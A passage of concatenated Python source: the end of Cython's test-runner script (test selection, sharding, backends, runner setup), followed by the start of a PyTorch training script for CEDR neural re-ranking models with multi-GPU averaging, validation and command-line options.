sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
"""
Print regular time stamps into the build logs to find slow tests.
@param interval: time interval in seconds
"""
if not interval or interval < 0:
# Do nothing
yield
return
try:
_xrange = xrange
except NameError:
_xrange = range
import threading
import datetime
from time import sleep
interval = _xrange(interval * 4)
now = datetime.datetime.now
stop = False
# We capture stderr in some places.
# => make sure we write to the real (original) stderr of the test runner.
stderr = os.dup(2)
def write(s):
os.write(stderr, s if type(s) is bytes else s.encode('ascii'))
def time_stamper():
while True:
for _ in interval:
if stop:
return
sleep(1./4)
write('\n#### %s\n' % now())
thread = threading.Thread(target=time_stamper, name='time_stamper')
thread.setDaemon(True) # Py2 ...
thread.start()
try:
yield
finally:
stop = True
thread.join()
os.close(stderr)
def configure_cython(options):
global CompilationOptions, pyrex_default_options, cython_compile
from Cython.Compiler.Options import \
CompilationOptions, \
default_options as pyrex_default_options
from Cython.Compiler.Options import _directive_defaults as directive_defaults
from Cython.Compiler import Errors
Errors.LEVEL = 0 # show all warnings
from Cython.Compiler import Options
Options.generate_cleanup_code = 3 # complete cleanup code
from Cython.Compiler import DebugFlags
DebugFlags.debug_temp_code_comments = 1
pyrex_default_options['formal_grammar'] = options.use_formal_grammar
if options.profile:
directive_defaults['profile'] = True
if options.watermark:
import Cython.Compiler.Version
Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
if options.coverage:
coverage.report(show_missing=0)
if options.coverage_xml:
coverage.xml_report(outfile="coverage-report.xml")
if options.coverage_html:
coverage.html_report(directory="coverage-report-html")
def runtests_callback(args):
options, cmd_args, shard_num = args
options.shard_num = shard_num
return runtests(options, cmd_args)
def runtests(options, cmd_args, coverage=None):
# faulthandler should be able to provide a limited traceback
# in the event of a segmentation fault. Hopefully better than Travis
# just keeping running until timeout. Only available on Python 3.3+
try:
import faulthandler
except ImportError:
pass # OK - not essential
else:
faulthandler.enable()
if sys.platform == "win32" and sys.version_info < (3, 6):
# enable Unicode console output, if possible
try:
import win_unicode_console
except ImportError:
pass
else:
win_unicode_console.enable()
WITH_CYTHON = options.with_cython
ROOTDIR = os.path.abspath(options.root_dir)
WORKDIR = os.path.abspath(options.work_dir)
if WITH_CYTHON:
configure_cython(options)
xml_output_dir = options.xml_output_dir
if options.shard_num > -1:
WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
if xml_output_dir:
xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
# RUN ALL TESTS!
UNITTEST_MODULE = "Cython"
UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
if WITH_CYTHON:
if os.path.exists(WORKDIR):
for path in os.listdir(WORKDIR):
if path in ("support", "Cy3"): continue
shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
if not os.path.exists(WORKDIR):
os.makedirs(WORKDIR)
if options.shard_num <= 0:
sys.stderr.write("Python %s\n" % sys.version)
sys.stderr.write("\n")
if WITH_CYTHON:
sys.stderr.write("Running tests against Cython %s\n" % get_version())
else:
sys.stderr.write("Running tests without Cython.\n")
if options.for_debugging:
options.cleanup_workdir = False
options.cleanup_sharedlibs = False
options.fork = False
if WITH_CYTHON and include_debugger:
from Cython.Compiler.Options import default_options as compiler_default_options
compiler_default_options['gdb_debug'] = True
compiler_default_options['output_dir'] = os.getcwd()
if IS_PYPY:
if options.with_refnanny:
sys.stderr.write("Disabling refnanny in PyPy\n")
options.with_refnanny = False
if options.with_refnanny:
from pyximport.pyxbuild import pyx_to_dll
libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
build_in_temp=True,
pyxbuild_dir=os.path.join(WORKDIR, "support"))
sys.path.insert(0, os.path.split(libpath)[0])
CFLAGS.append("-DCYTHON_REFNANNY=1")
if options.limited_api:
CFLAGS.append("-DCYTHON_LIMITED_API=1")
CFLAGS.append('-Wno-unused-function')
if xml_output_dir and options.fork:
# doesn't currently work together
sys.stderr.write("Disabling forked testing to support XML test output\n")
options.fork = False
if WITH_CYTHON:
sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
test_bugs = False
if options.tickets:
for ticket_number in options.tickets:
test_bugs = True
cmd_args.append('ticket:%s' % ticket_number)
if not test_bugs:
for selector in cmd_args:
if selector.startswith('bugs'):
test_bugs = True
selectors = [ string_selector(r) for r in cmd_args ]
verbose_excludes = selectors or options.verbosity >= 2
if not selectors:
selectors = [ lambda x, tags=None: True ]
# Check which external modules are not present and exclude tests
# which depends on them (by prefix)
missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit
try:
import IPython.core.release
if list(IPython.core.release._ver) < [1, 0, 0]:
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('IPython'))
try:
raise ImportError("Jedi typer is currently broken, see GH#1845")
import jedi
if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('Jedi'))
if options.exclude:
exclude_selectors += [ string_selector(r) for r in options.exclude ]
if not COMPILER_HAS_INT128 or not IS_CPYTHON:
exclude_selectors += [RegExSelector('int128')]
if options.shard_num > -1:
exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
if not test_bugs:
bug_files = [
('bugs.txt', True),
('pypy_bugs.txt', IS_PYPY),
('pypy2_bugs.txt', IS_PYPY and IS_PY2),
('pypy_crash_bugs.txt', IS_PYPY),
('pypy_implementation_detail_bugs.txt', IS_PYPY),
('limited_api_bugs.txt', options.limited_api),
('windows_bugs.txt', sys.platform == 'win32'),
('cygwin_bugs.txt', sys.platform == 'cygwin')
]
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
for bugs_file_name, condition in bug_files if condition
]
global COMPILER
if options.compiler:
COMPILER = options.compiler
selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
backends = []
for backend in selected_backends:
if backend == 'c' and not options.use_c:
continue
elif backend == 'cpp' and not options.use_cpp:
continue
elif backend not in BACKENDS:
sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
backend, ','.join(BACKENDS)))
sys.exit(1)
backends.append(backend)
if options.shard_num <= 0:
sys.stderr.write("Backends: %s\n" % ','.join(backends))
languages = backends
if 'TRAVIS' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
bugs_file_name = 'travis_macos_cpp_bugs.txt'
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
]
if options.use_common_utility_dir:
common_utility_dir = os.path.join(WORKDIR, 'utility_code')
if not os.path.exists(common_utility_dir):
os.makedirs(common_utility_dir)
else:
common_utility_dir = None
sys.stderr.write("\n")
test_suite = unittest.TestSuite()
stats = Stats()
if options.unittests:
collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.doctests:
collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.filetests and languages:
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir, add_embedded_test=True, stats=stats)
test_suite.addTest(filetests.build_suite())
if options.examples and languages:
examples_workdir = os.path.join(WORKDIR, 'examples')
for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
filetests = TestBuilder(subdirectory, examples_workdir, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir,
default_mode='compile', stats=stats)
test_suite.addTest(filetests.build_suite())
if options.system_pyregr and languages:
sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
if not os.path.isdir(sys_pyregr_dir):
sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
if os.path.isdir(sys_pyregr_dir):
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, True, languages, test_bugs,
sys.version_info[0], common_utility_dir, stats=stats)
sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
if options.code_style and options.shard_num <= 0:
try:
import pycodestyle
except ImportError:
# Hack to make the exclusion visible.
missing_dep_excluder.tests_missing_deps.append('TestCodeFormat')
else:
test_suite.addTest(TestCodeFormat(options.cython_dir))
if xml_output_dir:
from Cython.Tests.xmlrunner import XMLTestRunner
if not os.path.exists(xml_output_dir):
try:
os.makedirs(xml_output_dir)
except OSError:
pass # concurrency issue?
test_runner = XMLTestRunner(output=xml_output_dir,
verbose=options.verbosity > 0)
if options.failfast:
sys.stderr.write("--failfast not supported with XML runner\n")
else:
text_runner_options = {}
if options.failfast:
text_runner_options['failfast'] = True
test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
if options.pyximport_py:
from pyximport import pyximport
pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
load_py_module_on_import_failure=True, inplace=True)
try:
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
except AttributeError:
pass # not available on PyPy
result = test_runner.run(test_suite)
if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
shutil.rmtree(common_utility_dir)
if missing_dep_excluder.tests_missing_deps:
sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
for test in missing_dep_excluder.tests_missing_deps:
sys.stderr.write(" %s\n" % test)
if options.with_refnanny:
import refnanny
sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
if options.exit_ok:
return options.shard_num, stats, 0
else:
return options.shard_num, stats, not result.wasSuccessful()
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(1)
sys.exit(1)
|
train.py
|
#!/usr/bin/env python
#
# This code is based on CEDR: https://github.com/Georgetown-IR-Lab/cedr
# It has some modifications/extensions and it relies on our custom BERT
# library: https://github.com/searchivarius/pytorch-pretrained-BERT-mod
# (c) Georgetown IR lab & Carnegie Mellon University
# It's distributed under the MIT License
# MIT License is compatible with Apache 2 license for the code in this repo.
#
import os
import time
import gc
import sys
import math
import json
import argparse
import torch
import torch.distributed as dist
sys.path.append('.')
import scripts.utils as utils
import scripts.cedr.data as data
from scripts.cedr.model_init_utils import MODEL_PARAM_PREF
import scripts.cedr.model_init_utils as model_init_utils
from scripts.common_eval import METRIC_LIST, readQrelsDict, readRunDict, getEvalResults
from scripts.config import DEVICE_CPU
from tqdm import tqdm
from collections import namedtuple
from multiprocessing import Process
from threading import BrokenBarrierError
from multiprocessing import Barrier
# 5 minutes should be more than enough while waiting
# for other processes to reach the same training point
BARRIER_WAIT_MODEL_AVERAGE_TIMEOUT=60*5
# However (see comment below) we should wait more before validation completes
# Let's optimistically assume, it is not longer than two hours, but this
# might need to be fixed in the future. And a good fix should make validation
# use all GPUs
BARRIER_WAIT_VALIDATION_TIMEOUT=60*240
OPT_SGD='sgd'
OPT_ADAMW='adamw'
# Important: all the losses should have a reduction type sum!
class MarginRankingLossWrapper:
@staticmethod
def name():
return 'pairwise_margin'
'''This is a wrapper class for the margin ranking loss.
It expects that positive/negative scores are arranged in pairs'''
def __init__(self, margin):
self.loss = torch.nn.MarginRankingLoss(margin, reduction='sum')
def compute(self, scores):
pos_doc_scores = scores[:, 0]
neg_doc_scores = scores[:, 1]
ones = torch.ones_like(pos_doc_scores)
return self.loss.forward(pos_doc_scores, neg_doc_scores, target=ones)
class PairwiseSoftmaxLoss:
@staticmethod
def name():
return 'pairwise_softmax'
'''This is a wrapper class for the pairwise softmax ranking loss.
It expects that positive/negative scores are arranged in pairs'''
def compute(self, scores):
return torch.sum(1. - scores.softmax(dim=1)[:, 0]) # pairwise softmax
LOSS_FUNC_LIST = [PairwiseSoftmaxLoss.name(), MarginRankingLossWrapper.name()]
TrainParams = namedtuple('TrainParams',
['optim',
'init_lr', 'init_bert_lr', 'epoch_lr_decay', 'weight_decay',
'momentum',
'warmup_pct', 'batch_sync_qty',
'batches_per_train_epoch',
'batch_size', 'batch_size_val',
'max_query_len', 'max_doc_len',
'backprop_batch_size',
'epoch_qty',
'save_epoch_snapshots', 'save_last_snapshot_every_k_batch',
'device_name', 'print_grads',
'shuffle_train',
'use_external_eval', 'eval_metric'])
def avg_model_params(model):
"""Average model parameters across all GPUs."""
qty = float(dist.get_world_size())
for prm in model.parameters():
dist.all_reduce(prm.data, op=torch.distributed.ReduceOp.SUM)
prm.data /= qty
def clean_memory(device_name):
utils.sync_out_streams()
print('\nClearning memory device:', device_name)
utils.sync_out_streams()
gc.collect()
if device_name != DEVICE_CPU:
with torch.cuda.device(device_name):
torch.cuda.empty_cache()
def get_lr_desc(optimizer):
lr_arr = ['LRs:']
for param_group in optimizer.param_groups:
lr_arr.append('%.6f' % param_group['lr'])
return ' '.join(lr_arr)
class ValidationTimer:
def __init__(self, validation_checkpoints):
self.validation_checkpoints = sorted(validation_checkpoints)
self.pointer = 0
self.total_steps = 0
def is_time(self):
if self.pointer >= len(self.validation_checkpoints):
return False
if self.total_steps >= self.validation_checkpoints[self.pointer]:
self.pointer += 1
return True
return False
def last_checkpoint(self):
return self.validation_checkpoints[self.pointer - 1]
def increment(self, steps_qty):
self.total_steps += steps_qty
def train_iteration(model, sync_barrier,
is_master_proc, device_qty,
loss_obj,
train_params, max_train_qty,
valid_run, valid_qrel_filename,
optimizer, scheduler,
dataset, train_pairs, qrels,
validation_timer, valid_run_dir, valid_scores_holder,
save_last_snapshot_every_k_batch,
model_out_dir):
clean_memory(train_params.device_name)
model.train()
total_loss = 0.
total_prev_qty = total_qty = 0. # This is a total number of records processed, it can be different from
# the total number of training pairs
batch_size = train_params.batch_size
optimizer.zero_grad()
if train_params.print_grads:
print('Gradient sums before training')
for k, v in model.named_parameters():
print(k, 'None' if v.grad is None else torch.sum(torch.norm(v.grad, dim=-1, p=2)))
lr_desc = get_lr_desc(optimizer)
batch_id = 0
snap_id = 0
if is_master_proc:
utils.sync_out_streams()
pbar = tqdm('training', total=max_train_qty, ncols=80, desc=None, leave=False)
else:
pbar = None
for record in data.iter_train_pairs(model, train_params.device_name, dataset, train_pairs, train_params.shuffle_train,
qrels, train_params.backprop_batch_size,
train_params.max_query_len, train_params.max_doc_len):
scores = model(record['query_tok'],
record['query_mask'],
record['doc_tok'],
record['doc_mask'])
count = len(record['query_id']) // 2
scores = scores.reshape(count, 2)
loss = loss_obj.compute(scores)
loss.backward()
total_qty += count
if train_params.print_grads:
print(f'Records processed {total_qty} Gradient sums:')
for k, v in model.named_parameters():
print(k, 'None' if v.grad is None else torch.sum(torch.norm(v.grad, dim=-1, p=2)))
total_loss += loss.item()
if total_qty - total_prev_qty >= batch_size:
if is_master_proc:
validation_timer.increment(total_qty - total_prev_qty)
#print(total, 'optimizer step!')
optimizer.step()
optimizer.zero_grad()
total_prev_qty = total_qty
# Scheduler must make a step in each batch! *AFTER* the optimizer makes an update!
if scheduler is not None:
scheduler.step()
lr_desc = get_lr_desc(optimizer)
# This must be done in every process, not only in the master process
if device_qty > 1:
if batch_id % train_params.batch_sync_qty == 0:
try:
sync_barrier.wait(BARRIER_WAIT_MODEL_AVERAGE_TIMEOUT)
except BrokenBarrierError:
raise Exception('A model parameter synchronization timeout!')
avg_model_params(model)
batch_id += 1
# We will surely skip batch_id == 0
if save_last_snapshot_every_k_batch is not None and batch_id % save_last_snapshot_every_k_batch == 0:
if is_master_proc:
os.makedirs(model_out_dir, exist_ok=True)
out_tmp = os.path.join(model_out_dir, f'model.last.{snap_id}')
torch.save(model, out_tmp)
snap_id += 1
if pbar is not None:
pbar.update(count)
pbar.refresh()
utils.sync_out_streams()
pbar.set_description('%s train loss %.5f' % (lr_desc, total_loss / float(total_qty)) )
while is_master_proc and validation_timer.is_time() and valid_run_dir is not None:
model.eval()
os.makedirs(valid_run_dir, exist_ok=True)
run_file_name = os.path.join(valid_run_dir, f'batch_{validation_timer.last_checkpoint()}.run')
pbar.refresh()
utils.sync_out_streams()
score = validate(model, train_params, dataset,
valid_run,
qrelf=valid_qrel_filename, run_filename=run_file_name)
pbar.refresh()
utils.sync_out_streams()
print(f'\n# of batches={validation_timer.total_steps} score={score:.4g}')
valid_scores_holder[f'batch_{validation_timer.last_checkpoint()}'] = score
utils.save_json(os.path.join(valid_run_dir, "scores.log"), valid_scores_holder)
model.train()
if total_qty >= max_train_qty:
break
# Final model averaging in the end.
if device_qty > 1:
try:
sync_barrier.wait(BARRIER_WAIT_MODEL_AVERAGE_TIMEOUT)
except BrokenBarrierError:
raise Exception('A model parameter synchronization timeout!')
avg_model_params(model)
if pbar is not None:
pbar.close()
utils.sync_out_streams()
return total_loss / float(total_qty)
def validate(model, train_params, dataset, orig_run, qrelf, run_filename):
"""Model validation step:
1. Re-rank a given run
2. Save the re-ranked run
3. Evaluate results
:param model: a model reference.
:param train_params: training parameters
:param dataset: validation dataset
:param orig_run: a run to re-rank
:param qrelf: QREL files
:param run_filename: a file name to store the *RE-RANKED* run
:return:
"""
utils.sync_out_streams()
rerank_run = run_model(model, train_params, dataset, orig_run)
eval_metric = train_params.eval_metric
utils.sync_out_streams()
print(f'\nEvaluating run with QREL file {qrelf} using metric {eval_metric}')
utils.sync_out_streams()
# Let us always save the run
return getEvalResults(useExternalEval=train_params.use_external_eval,
evalMetric=eval_metric,
rerankRun=rerank_run,
qrelFile=qrelf,
runFile=run_filename)
def run_model(model, train_params, dataset, orig_run, desc='valid'):
rerank_run = {}
clean_memory(train_params.device_name)
with torch.no_grad(), \
tqdm(total=sum(len(r) for r in orig_run.values()), ncols=80, desc=desc, leave=False) as pbar:
model.eval()
d = {}
for records in data.iter_valid_records(model,
train_params.device_name,
dataset, orig_run,
train_params.batch_size_val,
train_params.max_query_len, train_params.max_doc_len):
scores = model(records['query_tok'],
records['query_mask'],
records['doc_tok'],
records['doc_mask'])
for qid, did, score in zip(records['query_id'], records['doc_id'], scores):
rerank_run.setdefault(qid, {})[did] = score.item()
pbar.update(len(records['query_id']))
return rerank_run
def do_train(sync_barrier,
device_qty, master_port, rank, is_master_proc,
dataset,
qrels, qrel_file_name,
train_pairs, valid_run,
valid_run_dir, valid_checkpoints,
model_out_dir,
model, loss_obj, train_params):
if device_qty > 1:
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = str(master_port)
dist.init_process_group(utils.PYTORCH_DISTR_BACKEND, rank=rank, world_size=device_qty)
device_name = train_params.device_name
if is_master_proc:
print('Training parameters:')
print(train_params)
print('Loss function:', loss_obj.name())
print('Device name:', device_name)
model.to(device_name)
lr = train_params.init_lr
bert_lr = train_params.init_bert_lr
epoch_lr_decay = train_params.epoch_lr_decay
weight_decay = train_params.weight_decay
momentum = train_params.momentum
top_valid_score = None
train_stat = {}
validation_timer = ValidationTimer(valid_checkpoints)
valid_scores_holder = dict()
for epoch in range(train_params.epoch_qty):
params = [(k, v) for k, v in model.named_parameters() if v.requires_grad]
non_bert_params = {'params': [v for k, v in params if not k.startswith('bert.')]}
bert_params = {'params': [v for k, v in params if k.startswith('bert.')], 'lr': bert_lr}
if train_params.optim == OPT_ADAMW:
optimizer = torch.optim.AdamW([non_bert_params, bert_params],
lr=lr, weight_decay=weight_decay)
elif train_params.optim == OPT_SGD:
optimizer = torch.optim.SGD([non_bert_params, bert_params],
lr=lr, weight_decay=weight_decay,
momentum=momentum)
else:
raise Exception('Unsupported optimizer: ' + train_params.optim)
bpte = train_params.batches_per_train_epoch
max_train_qty = data.train_item_qty(train_pairs) if bpte <= 0 else bpte * train_params.batch_size
lr_steps = int(math.ceil(max_train_qty / train_params.batch_size))
scheduler = None
if train_params.warmup_pct:
if is_master_proc:
print('Using a scheduler with a warm-up for %f steps' % train_params.warmup_pct)
scheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer,
total_steps=lr_steps,
max_lr=[lr, bert_lr],
anneal_strategy='linear',
pct_start=train_params.warmup_pct)
if is_master_proc:
print('Optimizer', optimizer)
start_time = time.time()
loss = train_iteration(model=model, sync_barrier=sync_barrier,
is_master_proc=is_master_proc,
device_qty=device_qty, loss_obj=loss_obj,
train_params=train_params, max_train_qty=max_train_qty,
valid_run=valid_run, valid_qrel_filename=qrel_file_name,
optimizer=optimizer, scheduler=scheduler,
dataset=dataset, train_pairs=train_pairs, qrels=qrels,
validation_timer=validation_timer, valid_run_dir=valid_run_dir,
valid_scores_holder=valid_scores_holder,
save_last_snapshot_every_k_batch=train_params.save_last_snapshot_every_k_batch,
model_out_dir=model_out_dir)
end_time = time.time()
if is_master_proc:
if train_params.save_epoch_snapshots:
print('Saving the model epoch snapshot')
torch.save(model, os.path.join(model_out_dir, f'model.{epoch}'))
os.makedirs(model_out_dir, exist_ok=True)
print(f'train epoch={epoch} loss={loss:.3g} lr={lr:g} bert_lr={bert_lr:g}')
utils.sync_out_streams()
valid_score = validate(model, train_params, dataset,
valid_run,
qrelf=qrel_file_name,
run_filename=os.path.join(model_out_dir, f'{epoch}.run'))
utils.sync_out_streams()
print(f'validation epoch={epoch} score={valid_score:.4g}')
train_stat[epoch] = {'loss' : loss,
'score' : valid_score,
'lr' : lr,
'bert_lr' : bert_lr,
'train_time' : end_time - start_time}
utils.save_json(os.path.join(model_out_dir, 'train_stat.json'), train_stat)
if top_valid_score is None or valid_score > top_valid_score:
top_valid_score = valid_score
print('new top validation score, saving the whole model')
torch.save(model, os.path.join(model_out_dir, 'model.best'))
# We must sync here or else non-master processes would start training and they
# would timeout on the model averaging barrier. However, the wait time here
# can be much longer. This is actually quite lame, because validation
# should instead be split accross GPUs, but validation is usually pretty quick
# and this should work as a (semi-)temporary fix
if device_qty > 1:
try:
sync_barrier.wait(BARRIER_WAIT_VALIDATION_TIMEOUT)
except BrokenBarrierError:
raise Exception('A model parameter synchronization timeout!')
lr *= epoch_lr_decay
bert_lr *= epoch_lr_decay
def main_cli():
parser = argparse.ArgumentParser('CEDR model training and validation')
model_init_utils.add_model_init_basic_args(parser, True)
parser.add_argument('--datafiles', metavar='data files', help='data files: docs & queries',
type=argparse.FileType('rt'), nargs='+', required=True)
parser.add_argument('--qrels', metavar='QREL file', help='QREL file',
type=argparse.FileType('rt'), required=True)
parser.add_argument('--train_pairs', metavar='paired train data', help='paired train data',
type=argparse.FileType('rt'), required=True)
parser.add_argument('--valid_run', metavar='validation file', help='validation file',
type=argparse.FileType('rt'), required=True)
parser.add_argument('--model_out_dir',
metavar='model out dir', help='an output directory for the trained model',
required=True)
parser.add_argument('--epoch_qty', metavar='# of epochs', help='# of epochs',
type=int, default=10)
parser.add_argument('--no_cuda', action='store_true')
parser.add_argument('--warmup_pct', metavar='warm-up fraction',
default=None, type=float,
help='use a warm-up/cool-down learning-reate schedule')
parser.add_argument('--device_qty', type=int, metavar='# of device for multi-GPU training',
default=1, help='# of GPUs for multi-GPU training')
parser.add_argument('--batch_sync_qty', metavar='# of batches before model sync',
type=int, default=4, help='Model syncronization frequency for multi-GPU trainig in the # of batche')
parser.add_argument('--master_port', type=int, metavar='pytorch master port',
default=None, help='pytorch master port for multi-GPU training')
parser.add_argument('--print_grads', action='store_true',
help='print gradient norms of parameters')
parser.add_argument('--save_epoch_snapshots', action='store_true',
help='save model after each epoch')
parser.add_argument('--save_last_snapshot_every_k_batch',
metavar='debug: save latest snapshot every k batch',
type=int, default=None,
help='debug option: save latest snapshot every k batch')
parser.add_argument('--seed', metavar='random seed', help='random seed',
type=int, default=42)
parser.add_argument('--optim', metavar='optimizer', choices=[OPT_SGD, OPT_ADAMW], default=OPT_ADAMW,
help='Optimizer')
parser.add_argument('--loss_margin', metavar='loss margin', help='Margin in the margin loss',
type=float, default=1)
parser.add_argument('--init_lr', metavar='init learn. rate',
type=float, default=0.001, help='Initial learning rate for BERT-unrelated parameters')
parser.add_argument('--momentum', metavar='SGD momentum',
type=float, default=0.9, help='SGD momentum')
parser.add_argument('--init_bert_lr', metavar='init BERT learn. rate',
type=float, default=0.00005, help='Initial learning rate for BERT parameters')
parser.add_argument('--epoch_lr_decay', metavar='epoch LR decay',
type=float, default=1.0, help='Per-epoch learning rate decay')
parser.add_argument('--weight_decay', metavar='weight decay',
type=float, default=0.0, help='optimizer weight decay')
parser.add_argument('--batch_size', metavar='batch size',
type=int, default=32, help='batch size')
parser.add_argument('--batch_size_val', metavar='val batch size',
type=int, default=32, help='validation batch size')
parser.add_argument('--backprop_batch_size', metavar='backprop batch size',
type=int, default=1,
help='batch size for each backprop step')
parser.add_argument('--batches_per_train_epoch', metavar='# of rand. batches per epoch',
type=int, default=0,
help='# of random batches per epoch: 0 tells to use all data')
parser.add_argument('--max_query_val', metavar='max # of val queries',
type=int, default=0,
help='max # of validation queries: 0 tells to use all data')
parser.add_argument('--no_shuffle_train', action='store_true',
help='disabling shuffling of training data')
parser.add_argument('--use_external_eval', action='store_true',
help='use external eval tools: gdeval or trec_eval')
parser.add_argument('--eval_metric', choices=METRIC_LIST, default=METRIC_LIST[0],
help='Metric list: ' + ','.join(METRIC_LIST),
metavar='eval metric')
parser.add_argument('--loss_func', choices=LOSS_FUNC_LIST,
default=PairwiseSoftmaxLoss.name(),
help='Loss functions: ' + ','.join(LOSS_FUNC_LIST))
parser.add_argument('--json_conf', metavar='JSON config',
type=str, default=None,
help='a JSON config (simple-dictionary): keys are the same as args, takes precedence over command line args')
parser.add_argument('--valid_run_dir', metavar='', type=str, default=None, help='directory to store predictions on validation set')
parser.add_argument('--valid_checkpoints', metavar='', type=str, default=None, help='validation checkpoints (in # of batches)')
args = parser.parse_args()
print(args)
utils.sync_out_streams()
all_arg_names = vars(args).keys()
if args.json_conf is not None:
conf_file = args.json_conf
print(f'Reading configuration variables from {conf_file}')
add_conf = utils.read_json(conf_file)
for arg_name, arg_val in add_conf.items():
if arg_name not in all_arg_names:
print(f'Invalid option in the configuration file: {arg_name}')
sys.exit(1)
arg_default = getattr(args, arg_name)
exp_type = type(arg_default)
if arg_default is not None and type(arg_val) != exp_type:
print(f'Invalid type in the configuration file: {arg_name} expected type: '+str(type(exp_type)) + f' default {arg_default}')
sys.exit(1)
print(f'Using {arg_name} from the config')
setattr(args, arg_name, arg_val)
# This hack copies max query and document length parameters to the model space parameters
# maybe some other approach is more elegant, but this one should at least work
setattr(args, f'{MODEL_PARAM_PREF}max_query_len', args.max_query_len)
setattr(args, f'{MODEL_PARAM_PREF}max_doc_len', args.max_doc_len)
if args.save_last_snapshot_every_k_batch is not None and args.save_last_snapshot_every_k_batch < 2:
print('--save_last_snapshot_every_k_batch should be > 1')
sys.exit(1)
utils.set_all_seeds(args.seed)
loss_name = args.loss_func
if loss_name == PairwiseSoftmaxLoss.name():
loss_obj = PairwiseSoftmaxLoss()
elif loss_name == MarginRankingLossWrapper.name():
loss_obj = MarginRankingLossWrapper(margin = args.loss_margin)
else:
print('Unsupported loss: ' + loss_name)
sys.exit(1)
# If we have the complete model, we just load it,
# otherwise we first create a model and load *SOME* of its weights.
# For example, if we start from an original BERT model, which has
# no extra heads, it we will load only the respective weights and
# initialize the weights of the head randomly.
if args.init_model is not None:
print('Loading a complete model from:', args.init_model.name)
model = torch.load(args.init_model.name, map_location='cpu')
elif args.init_model_weights is not None:
model = model_init_utils.create_model_from_args(args)
print('Loading model weights from:', args.init_model_weights.name)
model.load_state_dict(torch.load(args.init_model_weights.name, map_location='cpu'), strict=False)
else:
print('Creating the model from scratch!')
model = model_init_utils.create_model_from_args(args)
os.makedirs(args.model_out_dir, exist_ok=True)
print(model)
utils.sync_out_streams()
model.set_grad_checkpoint_param(args.grad_checkpoint_param)
dataset = data.read_datafiles(args.datafiles)
qrelf = args.qrels.name
qrels = readQrelsDict(qrelf)
train_pairs_all = data.read_pairs_dict(args.train_pairs)
valid_run = readRunDict(args.valid_run.name)
max_query_val = args.max_query_val
query_ids = list(valid_run.keys())
if max_query_val > 0:
query_ids = query_ids[0:max_query_val]
valid_run = {k: valid_run[k] for k in query_ids}
print('# of eval. queries:', len(query_ids), ' in the file', args.valid_run.name)
device_qty = args.device_qty
master_port = args.master_port
if device_qty > 1:
if master_port is None:
print('Specify a master port for distributed training!')
sys.exit(1)
processes = []
is_distr_train = device_qty > 1
qids = []
if is_distr_train:
qids = list(train_pairs_all.keys())
sync_barrier = Barrier(device_qty)
# We must go in the reverse direction, b/c
# rank == 0 trainer is in the same process and
# we call the function do_train in the same process,
# i.e., this call is blocking processing and
# prevents other processes from starting.
for rank in range(device_qty - 1, -1, -1):
if is_distr_train:
device_name = f'cuda:{rank}'
else:
device_name = args.device_name
if args.no_cuda:
device_name = DEVICE_CPU
# When we have only a single GPP, the main process is its own master
is_master_proc = rank == 0
train_params = TrainParams(init_lr=args.init_lr, init_bert_lr=args.init_bert_lr,
momentum=args.momentum,
warmup_pct=args.warmup_pct, batch_sync_qty=args.batch_sync_qty,
epoch_lr_decay=args.epoch_lr_decay, weight_decay=args.weight_decay,
backprop_batch_size=args.backprop_batch_size,
batches_per_train_epoch=args.batches_per_train_epoch,
save_epoch_snapshots=args.save_epoch_snapshots,
save_last_snapshot_every_k_batch=args.save_last_snapshot_every_k_batch,
batch_size=args.batch_size, batch_size_val=args.batch_size_val,
max_query_len=args.max_query_len, max_doc_len=args.max_doc_len,
epoch_qty=args.epoch_qty, device_name=device_name,
use_external_eval=args.use_external_eval, eval_metric=args.eval_metric.lower(),
print_grads=args.print_grads,
